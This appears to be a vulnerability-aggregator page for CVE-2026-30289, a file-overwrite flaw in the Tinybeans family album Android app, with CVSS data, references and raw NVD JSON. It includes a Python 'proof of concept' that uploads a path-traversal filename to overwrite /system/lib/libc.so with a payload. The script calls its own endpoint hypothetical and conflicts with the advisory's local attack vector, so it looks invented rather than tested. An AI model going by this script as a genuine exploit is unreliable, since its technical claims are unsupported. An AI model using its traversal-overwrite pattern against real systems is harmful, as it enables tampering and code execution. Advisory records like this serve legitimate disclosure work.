CVE-2026-30289

Description

An arbitrary file overwrite vulnerability in Tinybeans Private Family Album App v5.9.5-prod allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tinybeans:private_family_album:5.9.5:*:*:*:*:android:*:* - VULNERABLE

Tinybeans Private Family Album App <= 5.9.5-prod

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-30289
# This script simulates the arbitrary file overwrite vulnerability.

import requests

def exploit(target_ip, malicious_file_path):
    # The endpoint responsible for file import (hypothetical)
    url = f"http://{target_ip}/api/import"
    
    # Craft the payload to overwrite a critical file (e.g., library or config)
    # Using path traversal to escape the sandbox
    files = {
        'file': ('../../../../../system/lib/libc.so', open(malicious_file_path, 'rb'), 'application/octet-stream')
    }
    
    try:
        print(f"[+] Sending malicious file to {url}...")
        response = requests.post(url, files=files)
        
        if response.status_code == 200:
            print("[+] Exploit successful! File overwritten.")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Usage: python poc.py <target_ip> <local_malicious_file>
    # Example payload could be a shellcode or modified config
    exploit("127.0.0.1", "payload.bin")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30289
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30289
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30289/
[4] VulDB https://vuldb.com/cve/CVE-2026-30289
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/17
[6] https://play.google.com/store/apps/details?id=com.tinybeans
[7] https://secsys.fudan.edu.cn/
[8] https://tinybeans.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30289", "sourceIdentifier": "[email protected]", "published": "2026-04-01T14:16:49.910", "lastModified": "2026-04-02T19:40:06.643", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in Tinybeans Private Family Album App v5.9.5-prod allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tinybeans:private_family_album:5.9.5:*:*:*:*:android:*:*", "matchCriteriaId": "4A78A0FE-9D92-4176-BB2A-95C70C22F84D"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/17", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://play.google.com/store/apps/details?id=com.tinybeans", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://tinybeans.com/", "source": "[email protected]", "tags": ["Product"]}]}}